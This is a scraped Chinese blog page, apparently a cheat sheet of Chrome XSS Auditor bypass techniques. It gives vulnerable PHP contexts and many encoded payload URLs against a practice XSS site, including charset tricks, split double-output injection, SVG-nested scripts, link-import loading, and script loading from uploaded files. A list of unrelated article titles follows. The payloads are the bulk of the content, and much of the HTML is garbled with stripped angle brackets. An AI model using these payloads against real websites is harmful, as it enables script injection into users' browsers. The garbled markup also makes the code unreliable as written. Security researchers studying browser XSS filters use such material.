$html = %3c%3c%3cstr,浏览器安全 / Chrome XSS Auditor bypass
test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
输出在属性中,并且后面还有的情况
context:
img alt="">
script> y = "abc"; script>
payload
{gfm-js-extract-pre-1}
test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22
双输出点的情况
context:
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."
";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."
";
?>
payload:
http://xxx/chrome.php?text1=script>alert(/XSS/);void('&text2=')script>
http://xxx/chrome.php?text1=script>alert(/XSS/);document.write('&text2=')script>
test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
大概2015-06-23以前的版本均可。
context = 全部情况
payload:
xss=svg>script>/1/>alert(document.domain)script>svg>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
Chrome 36~40 link 导入html导致bypass
Fixed on Oct 10, 2014.(实际上15年初还存在)
https://code.google.com/p/chromium/issues/detail?id=421166
http://www.wooyun.org/bugs/wooyun-2010-090304
由于link导入外部html导致XSSAuditor绕过。
context = 全部情况
payload
xss=link rel=import href=https://auth.mhz.pw/game/xss/link.php>
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E
输出在script内字符串位置的情况
如果允许闭合字符串,直接闭合并写入javascript即可,如:
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
但如果不能闭合单引号呢?如这个context
html>
head>
meta charset="utf-8">
title>alltitle>
script type="text/javascript">
var a = 'php echo addslashes($_GET["xss"]); ?>';
script>
head>
body>
123
body>
html>
payload
script>
x = "script>svg>script>alert(1)+"";
script>
x = "script>svg>script>alert(1)+'";
test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
有可控上传点的通用Bypass
context:
网站域名下有可控的上传点,我可以上传一个.txt或.js等文件(只要不是媒体文件,其他文件均可,比如上传是黑名单验证的,可以随便写个后缀)。再引入script标签的src属性即可。
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
$_GET['x'])?>
最新文章
- python中表示红色的表达式_python-SymPy中表达式的抽象表示
- [转载]INF文件格式说明
- python列表索引超出范围 等于啥_python中的“列表索引超出范围”
- 在linux系统中安装matplotlib
- mysql udb_MySQL InnoDB的一些参数说明
- 理解 maven 的核心概念
- BZOJ4503 两个串 【fft】
- 如何写一个数据库中间件以及需要准备的知识储备
- minGW, cygwin, GnuWin32【C++的跨平台交叉编译问题】
- 为何python不好找工作-为什么我不建议你通过 Python 去找工作?
- 在Word2007文档中创建数学公式——使用Word公式编辑器
- 使用pako.js压缩、解压数据
- Clion笔记- 菜单栏不见了...
- Python烤地瓜案例
- 后端传给xml格式文件前端要求导出xslx,表格文件
- PostgreSQL:关于 socket 文件 /tmp/.s.PGSQL.nnnn 丢失处理
- Spring Boot入门教程(三十五):支付宝集成-准备工作
- office 2016下载安装
- Android The emulator process for AVD XXX has terminated.
- 51_LCD1602 - DS1302可调时钟
热门文章
- 九九乘法表 -- 2015/9/24
- com.android.ut是什么文件,妙用UT数据文件夹%AppData%\uTorrent
- 4G模块连接MQTT
- lucky-canvas抽奖插件-大转盘-九宫格-老虎机
- 【无标题】XGPON和XGSPON MA5800 三方兼容
- HTML5和CSS3自我学习认知基础知识
- 吴恩达《机器学习》课后测试Ex2:逻辑回归(详细Python代码注解)
- linux下pppoe服务器搭建
- zemax设计35mm镜头_ZEMAX杂光分析实例
- 【原创】python爬虫 某二手汽车网站 python+mysql